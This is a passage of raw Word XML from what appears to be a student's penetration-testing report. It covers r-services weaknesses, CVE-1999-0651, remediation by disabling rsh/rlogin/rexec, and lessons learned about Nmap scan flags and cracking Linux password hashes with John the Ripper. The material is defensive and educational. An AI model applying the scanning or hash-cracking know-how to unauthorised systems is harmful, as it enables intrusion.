          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Vulnerable to MITM and replay attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC5BB2" w14:textId="77777777" w:rsidR="008744A2" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="008744A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Weak or no authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA79684" w14:textId="3BACD7B7" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="008744A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>CVE-1999-0651: Allows unauthorized remote access if .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>rhosts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>hosts.equiv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve"> misconfigured</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E0F16D" w14:textId="77777777" w:rsidR="00E24B2E" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="005C25A0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Impact: Network users can impersonate others and execute remote commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E918DFF" w14:textId="6169651E" w:rsidR="00517A48" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="00517A48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Remediation:</w:t>
      </w:r>
      <w:r w:rsidR="00517A48" w:rsidRPr="007F7916">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A24F3EC" w14:textId="25621753" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="0018476F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve">Immediately disable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>rexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve">, rlogin, and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007F7916">
        <w:t>rsh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007F7916">
        <w:t xml:space="preserve"> services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C225C28" w14:textId="7CB29057" w:rsidR="005C25A0" w:rsidRPr="007F7916" w:rsidRDefault="005C25A0" w:rsidP="0018476F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Replace with SSH-based alternatives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3581EE" w14:textId="429091D1" w:rsidR="00904650" w:rsidRDefault="005C25A0" w:rsidP="00904650">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7916">
        <w:t>Reference: MITRE CVE-1999-0651</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD72F0E" w14:textId="77777777" w:rsidR="00904650" w:rsidRDefault="00904650" w:rsidP="00904650"/>
    <w:p w14:paraId="03228AFC" w14:textId="0C97ADFC" w:rsidR="00904650" w:rsidRDefault="00697997" w:rsidP="00904650">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Major Learning From this project –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5E794" w14:textId="77777777" w:rsidR="003B7413" w:rsidRDefault="003D4752" w:rsidP="003D4752">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D4752">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Developed a comprehensive understanding of penetration testing workflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E063627" w14:textId="407C42E8" w:rsidR="003B7413" w:rsidRPr="003553F5" w:rsidRDefault="003D4752" w:rsidP="003553F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Gained hands-on experience with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B7413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B7413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>, and John the Ripper.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB530C7" w14:textId="0BABEF41" w:rsidR="00697997" w:rsidRDefault="003D4752" w:rsidP="00904650">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B7413">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Learned to responsibly report and remediate security issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD09BC5" w14:textId="77777777" w:rsidR="004755F4" w:rsidRDefault="007F38A1" w:rsidP="00904650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 I learned how to create and manage users in Linux and how their details are stored in system files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170D71E4" w14:textId="77777777" w:rsidR="004755F4" w:rsidRDefault="007F38A1" w:rsidP="00904650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I understood how passwords are saved in hashed format and how they can be cracked using tools like John the Ripper with wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D46398" w14:textId="77777777" w:rsidR="004755F4" w:rsidRDefault="007F38A1" w:rsidP="00904650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 I also used </w:t>
      </w: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to scan systems for open ports, detect services running on them, and check the operating system. For this, I used commands like </w:t>
      </w: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-v to find open ports, </w:t>
      </w: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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> to find service versions, and </w:t>
      </w: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-O to detect the OS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEF087F" w14:textId="7D1936BF" w:rsidR="007F38A1" w:rsidRDefault="007F38A1" w:rsidP="00904650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I explored services like SMB and R services, identified outdated or risky ones, and understood why they should be updated or disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282FF98A" w14:textId="5384F52E" w:rsidR="003553F5" w:rsidRPr="003B7413" w:rsidRDefault="003553F5" w:rsidP="00904650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Understood vulnerabilities associated with outdated software.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003553F5" w:rsidRPr="003B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6D8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="80F00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6F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B886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11F8C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73A05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20B8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6361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2746E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="743CB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43E09"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4984A21E"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1487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A6B32D6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E1F2832A"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE4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C4C0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="802ED206"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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22D8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="99804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052D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11DEE5DA"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1647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1FBC1682"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1E9A53EA"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1407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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1FD15C69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D242B744"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE4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3025B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F738D96E"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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574547"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4203630"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1487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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="26D5056F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59B29816"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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8A7094"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="81949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D39A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7787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D45F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A00ED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40E32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ADF07AF2"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="767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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="38457E6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60F2B704"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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7205F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1604EC00"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1747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21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="44D71DA3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6024AB08"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE4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F2D45"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ECF61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6BE48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711BD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4798011E"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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E066F0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="82743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30BFB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="86502D8C"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1487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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="51F904C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AC00F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D2736"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E40657A6"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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F4C41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4942C05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D74027F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF205230"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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E7896"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D49C1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74237B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B31A894C"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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D93699"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA781D46"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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840E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA4C3D8E"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1507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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="78203B11"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6EF2CE5A"/>
    <w:lvl w:ilvl="0" w:tplc="1846BE48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6E50DC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D80D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51871"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E2C2D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660289">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1107502982">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1482696733">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="836841880">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1509832998">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="368842345">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="63259320">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="602996836">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="106430501">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="207112942">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1380126548">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="759713463">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1286500728">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1844658447">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="283846799">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="34543723">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1265187996">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2025859990">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1443382438">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="52240470">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="666400222">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1821992839">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1865246466">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="240680012">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1615751588">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1793665481">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1838765292">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1828471769">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1785979">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1264994816">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="895508954">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1563558962">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="340662484">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="715743478">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1176992483">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="141771465">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="16929908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00"/>
    <w:rsid w:val="000042A4"/>
    <w:rsid w:val="00007A35"/>
    <w:rsid w:val="00015ADC"/>
    <w:rsid w:val="00015B78"/>
    <w:rsid w:val="00021B62"/>
    <w:rsid w:val="00023915"/>
    <w:rsid w:val="00031A72"/>
    <w:rsid w:val="00047048"/>
    <w:rsid w:val="00057241"/>
    <w:rsid w:val="00091482"/>
    <w:rsid w:val="000929F4"/>
    <w:rsid w:val="00094022"/>
    <w:rsid w:val="000973F9"/>
    <w:rsid w:val="00097648"/>
    <w:rsid w:val="000B5FF1"/>
    <w:rsid w:val="000D3085"/>
    <w:rsid w:val="001006C6"/>
    <w:rsid w:val="00101873"/>
    <w:rsid w:val="00102026"/>
    <w:rsid w:val="001123A2"/>
    <w:rsid w:val="00127222"/>
    <w:rsid w:val="001345D1"/>
    <w:rsid w:val="00137D15"/>
    <w:rsid w:val="00162E08"/>
    <w:rsid w:val="001838D9"/>
    <w:rsid w:val="0018476F"/>
    <w:rsid w:val="00185DB8"/>
    <w:rsid w:val="00193FD4"/>
    <w:rsid w:val="001A5B52"/>
    <w:rsid w:val="001B1844"/>
    <w:rsid w:val="001B4A78"/>
    <w:rsid w:val="001C3860"/>
    <w:rsid w:val="001F1302"/>
    <w:rsid w:val="00203498"/>
    <w:rsid w:val="00205D47"/>
    <w:rsid w:val="00206327"/>
    <w:rsid w:val="00206FDC"/>
    <w:rsid w:val="0021530D"/>
    <w:rsid w:val="00217110"/>
    <w:rsid w:val="00217385"/>
    <w:rsid w:val="00246DD8"/>
    <w:rsid w:val="0024739A"/>
    <w:rsid w:val="00261CB0"/>
    <w:rsid w:val="002730D6"/>
    <w:rsid w:val="00277A50"/>
    <w:rsid w:val="002A6E30"/>
    <w:rsid w:val="002B195D"/>
    <w:rsid w:val="002F7B15"/>
    <w:rsid w:val="00300B6B"/>
    <w:rsid w:val="003237DF"/>
    <w:rsid w:val="00327336"/>
    <w:rsid w:val="00332EDF"/>
    <w:rsid w:val="00345E2C"/>
    <w:rsid w:val="0035001D"/>
    <w:rsid w:val="003553F5"/>
    <w:rsid w:val="00357B02"/>
    <w:rsid w:val="003621B6"/>
    <w:rsid w:val="0037082A"/>
    <w:rsid w:val="00373871"/>
    <w:rsid w:val="00376645"/>
    <w:rsid w:val="00382A42"/>
    <w:rsid w:val="003A4900"/>
    <w:rsid w:val="003B0F1D"/>
    <w:rsid w:val="003B7413"/>
    <w:rsid w:val="003C245E"/>
    <w:rsid w:val="003D1374"/>
    <w:rsid w:val="003D144A"/>
    <w:rsid w:val="003D4752"/>
    <w:rsid w:val="003E2500"/>
    <w:rsid w:val="00411DB9"/>
    <w:rsid w:val="0042163A"/>
    <w:rsid w:val="004234B2"/>
    <w:rsid w:val="00426D01"/>
    <w:rsid w:val="00431FB8"/>
    <w:rsid w:val="004323D6"/>
    <w:rsid w:val="00435146"/>
    <w:rsid w:val="00447012"/>
    <w:rsid w:val="00452CBC"/>
    <w:rsid w:val="004562D0"/>
    <w:rsid w:val="00460387"/>
    <w:rsid w:val="0046062C"/>
    <w:rsid w:val="00460992"/>
    <w:rsid w:val="00463EC2"/>
    <w:rsid w:val="00465AD6"/>
    <w:rsid w:val="00471793"/>
    <w:rsid w:val="004755F4"/>
    <w:rsid w:val="004A36C3"/>
    <w:rsid w:val="004B0897"/>
    <w:rsid w:val="004B6EF9"/>
    <w:rsid w:val="004C02AA"/>
    <w:rsid w:val="004C2D35"/>
    <w:rsid w:val="004D3B4E"/>
    <w:rsid w:val="004D6D86"/>
    <w:rsid w:val="004E6905"/>
    <w:rsid w:val="00515192"/>
    <w:rsid w:val="00517A48"/>
    <w:rsid w:val="0052349D"/>
    <w:rsid w:val="00526453"/>
    <w:rsid w:val="005341B3"/>
    <w:rsid w:val="00577D2A"/>
    <w:rsid w:val="00592111"/>
    <w:rsid w:val="0059242A"/>
    <w:rsid w:val="0059334C"/>
    <w:rsid w:val="005C25A0"/>
    <w:rsid w:val="005C3528"/>
    <w:rsid w:val="006008EE"/>
    <w:rsid w:val="00601030"/>
    <w:rsid w:val="006105A8"/>
    <w:rsid w:val="00611139"/>
    <w:rsid w:val="006124C6"/>
    <w:rsid w:val="0062108E"/>
    <w:rsid w:val="00630401"/>
    <w:rsid w:val="00636332"/>
    <w:rsid w:val="00636D55"/>
    <w:rsid w:val="00655039"/>
    <w:rsid w:val="00671D26"/>
    <w:rsid w:val="0067588D"/>
    <w:rsid w:val="00693371"/>
    <w:rsid w:val="00695BB6"/>
    <w:rsid w:val="00697997"/>
    <w:rsid w:val="006A17C3"/>
    <w:rsid w:val="006E3269"/>
    <w:rsid w:val="006F2E43"/>
    <w:rsid w:val="007010FE"/>
    <w:rsid w:val="00736F1A"/>
    <w:rsid w:val="007430C5"/>
    <w:rsid w:val="00743825"/>
    <w:rsid w:val="0074721D"/>
    <w:rsid w:val="007475BB"/>
    <w:rsid w:val="00765B47"/>
    <w:rsid w:val="0077504A"/>
    <w:rsid w:val="0078579A"/>
    <w:rsid w:val="00793896"/>
    <w:rsid w:val="007A254A"/>
    <w:rsid w:val="007A4110"/>
    <w:rsid w:val="007B1D7E"/>
    <w:rsid w:val="007E33DD"/>
    <w:rsid w:val="007F38A1"/>
    <w:rsid w:val="007F7916"/>
    <w:rsid w:val="00802759"/>
    <w:rsid w:val="008075D2"/>
    <w:rsid w:val="0081365F"/>
    <w:rsid w:val="00822415"/>
    <w:rsid w:val="0082510A"/>
    <w:rsid w:val="008522FA"/>
    <w:rsid w:val="008744A2"/>
    <w:rsid w:val="008759A9"/>
    <w:rsid w:val="00887315"/>
    <w:rsid w:val="008B131B"/>
    <w:rsid w:val="008C632B"/>
    <w:rsid w:val="008C6617"/>
    <w:rsid w:val="008C7385"/>
    <w:rsid w:val="008D419B"/>
    <w:rsid w:val="008F5462"/>
    <w:rsid w:val="00904650"/>
    <w:rsid w:val="00913959"/>
    <w:rsid w:val="0093733A"/>
    <w:rsid w:val="00941FD0"/>
    <w:rsid w:val="00987305"/>
    <w:rsid w:val="009A2AA1"/>
    <w:rsid w:val="009A38DE"/>
    <w:rsid w:val="009E517B"/>
    <w:rsid w:val="009F59FA"/>
    <w:rsid w:val="009F7E38"/>
    <w:rsid w:val="00A041F4"/>
    <w:rsid w:val="00A079C2"/>
    <w:rsid w:val="00A107F5"/>
    <w:rsid w:val="00A23984"/>
    <w:rsid w:val="00A471BB"/>
    <w:rsid w:val="00A47735"/>
    <w:rsid w:val="00A815E6"/>
    <w:rsid w:val="00A943E7"/>
    <w:rsid w:val="00A94EC9"/>
    <w:rsid w:val="00AC5044"/>
    <w:rsid w:val="00AD2AD7"/>
    <w:rsid w:val="00AF1B94"/>
    <w:rsid w:val="00B0217D"/>
    <w:rsid w:val="00B02375"/>
    <w:rsid w:val="00B30477"/>
    <w:rsid w:val="00B64461"/>
    <w:rsid w:val="00B65D47"/>
    <w:rsid w:val="00B71884"/>
    <w:rsid w:val="00B769FA"/>
    <w:rsid w:val="00B77F16"/>
    <w:rsid w:val="00BA34E5"/>
    <w:rsid w:val="00BA43DD"/>
    <w:rsid w:val="00BB188A"/>
    <w:rsid w:val="00BC04E9"/>
    <w:rsid w:val="00BD6637"/>
    <w:rsid w:val="00BD7FA5"/>
    <w:rsid w:val="00BF4173"/>
    <w:rsid w:val="00BF61CF"/>
    <w:rsid w:val="00C0131E"/>
    <w:rsid w:val="00C0153A"/>
    <w:rsid w:val="00C06DCB"/>
    <w:rsid w:val="00C073E1"/>
    <w:rsid w:val="00C237DE"/>
    <w:rsid w:val="00C50E4F"/>
    <w:rsid w:val="00C5632C"/>
    <w:rsid w:val="00C56CCE"/>
    <w:rsid w:val="00C56E02"/>
    <w:rsid w:val="00C65148"/>
    <w:rsid w:val="00C6622F"/>
    <w:rsid w:val="00C7153A"/>
    <w:rsid w:val="00CA618A"/>
    <w:rsid w:val="00CA7D89"/>
    <w:rsid w:val="00CB5945"/>
    <w:rsid w:val="00CC14AA"/>
    <w:rsid w:val="00CC4D67"/>
    <w:rsid w:val="00CC5AE6"/>
    <w:rsid w:val="00CC5F4B"/>
    <w:rsid w:val="00CD51DF"/>
    <w:rsid w:val="00CF5B1B"/>
    <w:rsid w:val="00D20F75"/>
    <w:rsid w:val="00D31987"/>
    <w:rsid w:val="00D40A85"/>
    <w:rsid w:val="00D44D40"/>
    <w:rsid w:val="00D649CB"/>
    <w:rsid w:val="00D70322"/>
    <w:rsid w:val="00D94CBD"/>
    <w:rsid w:val="00DA5BBD"/>
    <w:rsid w:val="00DB3C03"/>
    <w:rsid w:val="00DD6A39"/>
    <w:rsid w:val="00E07B3B"/>
    <w:rsid w:val="00E13113"/>
    <w:rsid w:val="00E2004E"/>
    <w:rsid w:val="00E23B79"/>
    <w:rsid w:val="00E24B2E"/>
    <w:rsid w:val="00E62B15"/>
    <w:rsid w:val="00E648F9"/>
    <w:rsid w:val="00E669BE"/>
    <w:rsid w:val="00E72536"/>
    <w:rsid w:val="00E72A39"/>
    <w:rsid w:val="00E77D90"/>
    <w:rsid w:val="00EA1B55"/>
    <w:rsid w:val="00EC2D34"/>
    <w:rsid w:val="00EC2F08"/>
    <w:rsid w:val="00ED3B1C"/>
    <w:rsid w:val="00EE2A93"/>
    <w:rsid w:val="00EF4E16"/>
    <w:rsid w:val="00F030CD"/>
    <w:rsid w:val="00F0358B"/>
    <w:rsid w:val="00F36D83"/>
    <w:rsid w:val="00F426B0"/>
    <w:rsid w:val="00F530E8"/>
    <w:rsid w:val="00F53A73"/>
    <w:rsid w:val="00F77315"/>
    <w:rsid w:val="00F83FC8"/>
    <w:rsid w:val="00F979AB"/>
    <w:rsid w:val="00FA030B"/>
    <w:rsid w:val="00FB1005"/>
